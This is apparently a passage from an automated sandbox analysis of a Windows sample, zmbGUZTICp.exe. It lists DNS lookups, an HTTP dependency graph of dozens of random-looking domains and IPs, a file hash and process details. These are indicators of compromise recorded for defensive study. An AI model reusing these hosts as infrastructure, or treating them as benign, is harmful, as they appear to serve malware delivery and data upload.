                                                                                                                                                    Jan 14, 2022 10:44:01.201462030 CET192.168.2.68.8.8.80xa9a1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:01.368493080 CET192.168.2.68.8.8.80xae6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.079658031 CET192.168.2.68.8.8.80x63adStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:12.796425104 CET192.168.2.68.8.8.80xc715Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:22.727591991 CET192.168.2.68.8.8.80x1b8aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:22.909961939 CET192.168.2.68.8.8.80xa1e2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.076080084 CET192.168.2.68.8.8.80x8f81Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.241534948 CET192.168.2.68.8.8.80xa5c6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.735255957 CET192.168.2.68.8.8.80xe7caStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.017632008 CET192.168.2.68.8.8.80x9fdcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.186546087 CET192.168.2.68.8.8.80xf2beStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.353194952 CET192.168.2.68.8.8.80xce72Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.792356968 CET192.168.2.68.8.8.80xdfc3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.984512091 CET192.168.2.68.8.8.80xe353Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.174129009 CET192.168.2.68.8.8.80x6a12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.381947994 CET192.168.2.68.8.8.80x1cc3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.549240112 CET192.168.2.68.8.8.80x74cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.719943047 CET192.168.2.68.8.8.80xd01fStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:28.817889929 CET192.168.2.68.8.8.80xfbcaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:28.989167929 CET192.168.2.68.8.8.80x47e3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.163213015 CET192.168.2.68.8.8.80x6797Standard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.556011915 CET192.168.2.68.8.8.80x8873Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.749594927 CET192.168.2.68.8.8.80x4608Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.934479952 CET192.168.2.68.8.8.80xaef6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.115786076 CET192.168.2.68.8.8.80x8de9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.289908886 CET192.168.2.68.8.8.80x3976Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.467227936 CET192.168.2.68.8.8.80x94c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.641408920 CET192.168.2.68.8.8.80xc9baStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:33.873652935 CET192.168.2.68.8.8.80x2966Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:34.136259079 CET192.168.2.68.8.8.80x58f7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.034046888 CET192.168.2.68.8.8.80xcd85Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.399838924 CET192.168.2.68.8.8.80x8f64Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.576474905 CET192.168.2.68.8.8.80x7ce8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.841660023 CET192.168.2.68.8.8.80x24fcStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.192677975 CET192.168.2.68.8.8.80x7b69Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.358232975 CET192.168.2.68.8.8.80xcb45Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.533195972 CET192.168.2.68.8.8.80x3945Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.725630999 CET192.168.2.68.8.8.80x3f25Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:53.396308899 CET192.168.2.68.8.8.80x935cStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.346837997 CET192.168.2.68.8.8.80xb5f1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.518959045 CET192.168.2.68.8.8.80x5f2bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.711636066 CET192.168.2.68.8.8.80xfd7bStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.094153881 CET192.168.2.68.8.8.80x6c83Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.588779926 CET192.168.2.68.8.8.80xa9eaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.792838097 CET192.168.2.68.8.8.80xc644Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:03.762748003 CET192.168.2.68.8.8.80x3885Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:03.944444895 CET192.168.2.68.8.8.80x721bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:04.970577955 CET192.168.2.68.8.8.80x721bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.367841005 CET192.168.2.68.8.8.80xaea6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.562896967 CET192.168.2.68.8.8.80x5e9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.775547028 CET192.168.2.68.8.8.80x2626Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:43.545881033 CET192.168.2.68.8.8.80xadaStandard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jan 14, 2022 10:43:44.922651052 CET8.8.8.8192.168.2.60x8523No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:45.096684933 CET8.8.8.8192.168.2.60x6b8bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:45.589972973 CET8.8.8.8192.168.2.60xb24dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:46.031016111 CET8.8.8.8192.168.2.60x7fc2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:46.204824924 CET8.8.8.8192.168.2.60x1213No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:46.676295996 CET8.8.8.8192.168.2.60x7ee1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.048309088 CET8.8.8.8192.168.2.60xf8eaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.216015100 CET8.8.8.8192.168.2.60xfb93No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.703352928 CET8.8.8.8192.168.2.60x1b5eNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:50.703531981 CET8.8.8.8192.168.2.60xc627No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:50.876921892 CET8.8.8.8192.168.2.60x27bdNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.042943001 CET8.8.8.8192.168.2.60x4517No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.352010012 CET8.8.8.8192.168.2.60x1fe2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.532625914 CET8.8.8.8192.168.2.60x2f07No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.788089991 CET8.8.8.8192.168.2.60xc35cNo error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.869045019 CET8.8.8.8192.168.2.60x34a3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.034235001 CET8.8.8.8192.168.2.60xad87No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.204862118 CET8.8.8.8192.168.2.60x9243No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.387742996 CET8.8.8.8192.168.2.60xbcdbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.558407068 CET8.8.8.8192.168.2.60x6463No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.249917984 CET8.8.8.8192.168.2.60x3b21No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.421777010 CET8.8.8.8192.168.2.60x5292No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.597048998 CET8.8.8.8192.168.2.60x6dbaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.793905973 CET8.8.8.8192.168.2.60xfaf6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:58.653935909 CET8.8.8.8192.168.2.60xcd6cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:58.851239920 CET8.8.8.8192.168.2.60x9e96No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.039109945 CET8.8.8.8192.168.2.60xfa32No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.207215071 CET8.8.8.8192.168.2.60x4146No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.207215071 CET8.8.8.8192.168.2.60x4146No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.207215071 CET8.8.8.8192.168.2.60x4146No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.207215071 CET8.8.8.8192.168.2.60x4146No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.207215071 CET8.8.8.8192.168.2.60x4146No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:01.056061029 CET8.8.8.8192.168.2.60x798dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:01.218846083 CET8.8.8.8192.168.2.60xa9a1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:01.385657072 CET8.8.8.8192.168.2.60xae6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:10.106473923 CET8.8.8.8192.168.2.60x63adNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:12.815992117 CET8.8.8.8192.168.2.60xc715No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:22.744677067 CET8.8.8.8192.168.2.60x1b8aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:22.927047968 CET8.8.8.8192.168.2.60xa1e2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.095449924 CET8.8.8.8192.168.2.60x8f81No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.580354929 CET8.8.8.8192.168.2.60xa5c6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:23.754772902 CET8.8.8.8192.168.2.60xe7caNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.036843061 CET8.8.8.8192.168.2.60x9fdcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.205995083 CET8.8.8.8192.168.2.60xf2beNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.643091917 CET8.8.8.8192.168.2.60xce72No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:24.812130928 CET8.8.8.8192.168.2.60xdfc3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.001595020 CET8.8.8.8192.168.2.60xe353No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.193222046 CET8.8.8.8192.168.2.60x6a12No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.401681900 CET8.8.8.8192.168.2.60x1cc3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.568310022 CET8.8.8.8192.168.2.60x74cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:25.739336014 CET8.8.8.8192.168.2.60xd01fNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:28.837270975 CET8.8.8.8192.168.2.60xfbcaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.006572962 CET8.8.8.8192.168.2.60x47e3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.187659979 CET8.8.8.8192.168.2.60x6797No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.187659979 CET8.8.8.8192.168.2.60x6797No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.575335979 CET8.8.8.8192.168.2.60x8873No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.766783953 CET8.8.8.8192.168.2.60x4608No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:29.957333088 CET8.8.8.8192.168.2.60xaef6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.132836103 CET8.8.8.8192.168.2.60x8de9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.313347101 CET8.8.8.8192.168.2.60x3976No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.487637043 CET8.8.8.8192.168.2.60x94c2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:30.968112946 CET8.8.8.8192.168.2.60xc9baNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:33.891127110 CET8.8.8.8192.168.2.60x2966No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:34.155517101 CET8.8.8.8192.168.2.60x58f7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.060764074 CET8.8.8.8192.168.2.60xcd85No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.421783924 CET8.8.8.8192.168.2.60x8f64No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.607868910 CET8.8.8.8192.168.2.60x7ce8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:35.867207050 CET8.8.8.8192.168.2.60x24fcNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.210330963 CET8.8.8.8192.168.2.60x7b69No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.377250910 CET8.8.8.8192.168.2.60xcb45No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.552405119 CET8.8.8.8192.168.2.60x3945No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:47.744528055 CET8.8.8.8192.168.2.60x3f25No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:53.510515928 CET8.8.8.8192.168.2.60x935cNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.367500067 CET8.8.8.8192.168.2.60xb5f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.538839102 CET8.8.8.8192.168.2.60x5f2bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:55.733985901 CET8.8.8.8192.168.2.60xfd7bNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.429790974 CET8.8.8.8192.168.2.60x6c83No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.608838081 CET8.8.8.8192.168.2.60xa9eaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:59.810125113 CET8.8.8.8192.168.2.60xc644No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:03.782224894 CET8.8.8.8192.168.2.60x3885No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:04.989928961 CET8.8.8.8192.168.2.60x721bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.270993948 CET8.8.8.8192.168.2.60x721bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.384814024 CET8.8.8.8192.168.2.60xaea6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:05.585026979 CET8.8.8.8192.168.2.60x5e9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:43.565538883 CET8.8.8.8192.168.2.60xadaNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • jsplktel.org
                                                                                                                                                      • host-data-coin-11.com
                                                                                                                                                    • ivfhujym.net
                                                                                                                                                    • nipgcts.com
                                                                                                                                                    • bxide.net
                                                                                                                                                    • rgxie.com
                                                                                                                                                    • jnolpkdknj.net
                                                                                                                                                    • stbgsgw.com
                                                                                                                                                    • uknnqg.net
                                                                                                                                                    • data-host-coin-8.com
                                                                                                                                                    • otraxus.net
                                                                                                                                                    • qsvubjh.com
                                                                                                                                                    • wwmessepf.com
                                                                                                                                                    • nlxvu.net
                                                                                                                                                    • xjjyulxcfs.com
                                                                                                                                                    • unicupload.top
                                                                                                                                                    • jdecaoxkel.org
                                                                                                                                                    • uhcpfe.com
                                                                                                                                                    • qwfybhxm.org
                                                                                                                                                    • odyvlsasq.com
                                                                                                                                                    • eahqahqv.net
                                                                                                                                                    • daixhajgka.com
                                                                                                                                                    • cghrkunn.com
                                                                                                                                                    • pfwxavhis.net
                                                                                                                                                    • 185.7.214.171:8080
                                                                                                                                                    • ebgfrfm.org
                                                                                                                                                    • covjb.org
                                                                                                                                                    • rguskwyq.org
                                                                                                                                                    • vpvxxeoni.org
                                                                                                                                                    • arpfh.net
                                                                                                                                                    • nnyntvsvo.org
                                                                                                                                                    • sopssp.net
                                                                                                                                                    • vhclpnkvya.com
                                                                                                                                                    • lphbdueqjj.com
                                                                                                                                                    • kakjdonis.net
                                                                                                                                                    • gpnorygxw.org
                                                                                                                                                    • ackvfel.net
                                                                                                                                                    • jrhwfdx.org
                                                                                                                                                    • yrgforv.org
                                                                                                                                                    • hwivor.org
                                                                                                                                                    • wpctxossq.com
                                                                                                                                                    • kkrgipwnic.net
                                                                                                                                                    • jqlty.com
                                                                                                                                                    • uqclrrn.org
                                                                                                                                                    • khnjbia.net
                                                                                                                                                    • gtapfy.com
                                                                                                                                                    • xokmpq.org
                                                                                                                                                    • nbjhuloh.com
                                                                                                                                                    • cifusjcgu.net
                                                                                                                                                    • jfioua.org
                                                                                                                                                    • usyqjbp.org
                                                                                                                                                    • lepql.com
                                                                                                                                                    • txdwk.net
                                                                                                                                                    • a0621298.xsph.ru
                                                                                                                                                    • phiqqvf.net
                                                                                                                                                    • tmtuscxant.net
                                                                                                                                                    • jpiimxqwms.net
                                                                                                                                                    • 185.215.113.35
                                                                                                                                                    • lsmlx.org
                                                                                                                                                    • etxdwvf.com
                                                                                                                                                    • 185.163.204.22
                                                                                                                                                    • 185.163.204.24
                                                                                                                                                    • lnxul.net
                                                                                                                                                    • krijk.com
                                                                                                                                                    • brqduyej.org
                                                                                                                                                    • imxgr.net
                                                                                                                                                    • koqghysihf.net
                                                                                                                                                    • kiocvqo.net
                                                                                                                                                    • kcgghyab.com
                                                                                                                                                    • smrwgxji.com

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: zmbGUZTICp.exe PID: 4404 Parent PID: 5260

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:02
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\zmbGUZTICp.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\zmbGUZTICp.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:319488 bytes
                                                                                                                                                    MD5 hash:9AF4D2022DC05C2DBBC4D218A8F0974C
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: zmbGUZTICp.exe PID: 3416 Parent PID: 4404

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:04
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\Desktop\zmbGUZTICp.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\zmbGUZTICp.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:319488 bytes
                                                                                                                                                    MD5 hash:9AF4D2022DC05C2DBBC4D218A8F0974C
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
